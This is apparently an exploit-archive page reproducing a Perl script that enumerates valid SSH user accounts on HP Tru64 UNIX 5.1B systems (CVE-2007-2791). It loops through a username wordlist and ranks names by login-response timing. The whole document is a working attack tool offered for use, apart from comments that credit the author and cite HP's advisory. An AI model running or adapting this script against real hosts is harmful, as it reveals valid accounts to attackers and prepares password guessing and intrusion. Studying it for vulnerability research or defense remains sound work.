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HP Tru64 Remote Secure Shell User Enumeration Exploit (CVE-2007-2791)
===================================================================== HP Tru64 Remote Secure Shell User Enumeration Exploit (CVE-2007-2791) ===================================================================== #!/usr/bin/perl use warnings; use strict; # # Remember: you need to accept ssh key first! # use Tie::File; use Fcntl 'O_RDONLY'; use Expect; use Time::HiRes qw(gettimeofday); # # tru64-sshenum.pl # HP Tru64 Remote Secure Shell user enumeration exploit (CVE-2007-2791). # # Author: Andrea "bunker" Purificato # http://rawlab.mindcreations.com # # The following supported software versions are affected: # # HP Tru64 UNIX v5.1B-4 # HP Tru64 UNIX v5.1B-3 # # The Hewlett-Packard Company thanks Andrea Purificato for reporting this # vulnerability to security-alert@hp.com # # References: # - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01007552 # - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2791 # - http://rawlab.mindcreations.com/codes/exp/nix/tru64-sshenum.pl # my $verbose = undef; my $port = 22; my $timeout = 10; print <<BANNER; $0 - HP Tru64 Remote Secure Shell user enumeration exploit Andrea "bunker" Purificato - http://rawlab.mindcreations.com 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2 BANNER print "Usage: $0 <target> <userlist>\n" and exit(-1) if ($#ARGV<1); my $target = $ARGV[0]; my $wordlist = $ARGV[1]; chomp (my $ssh = `which ssh`); chomp (my $tel = `which telnet`); my %htimes; my @atimes; print "[+] Grabbing banner...\n"; my $exp = Expect->spawn("$tel -l fake $target $port") or die "Cannot spawn $tel: $!\n";; #$exp->log_stdout(0); $exp->expect(5,['SSH|ssh'=>sub{$exp->send(".\n")}]); $exp->close(); print "[+] Done!\n\n"; sub timing { my $user = shift @_; my $t0 = gettimeofday; my $t1 = undef; my $exp = Expect->spawn("$ssh -l $user -p $port $target") or die "Cannot spawn $ssh: $!\n";; $exp->log_stdout(0); $exp->expect($timeout,['assword:'=>sub{$exp->send(".\n")}]); $exp->expect(undef, [ qr'assword|denied'=>sub{$t1=gettimeofday}]); $t1 = gettimeofday unless ($t1); $exp->close(); return sprintf "%0.3f", ($t1-$t0); } tie my @wlst_ln, 'Tie::File', "$wordlist", mode=>O_RDONLY or die "$wordlist: $!"; print "[+] Started, please wait: "; for (@wlst_ln) { print "($_ dup?)" if ($htimes{$_}); my $ret = timing($_); $htimes{$_} = $ret unless ($htimes{$_}); push @atimes, $ret; unless ($verbose) { print "." } else { print "$_\t\t$ret\n" } } print " Done!\n\n"; # # Do whatever you want with time values: # # (sorted by values) # foreach my $key (sort {$htimes{$b}<=>$htimes{$a}} keys %htimes) { print "$key:\t\t$htimes{$key}\n"; } exit(0); # 0day.today [2024-12-26] #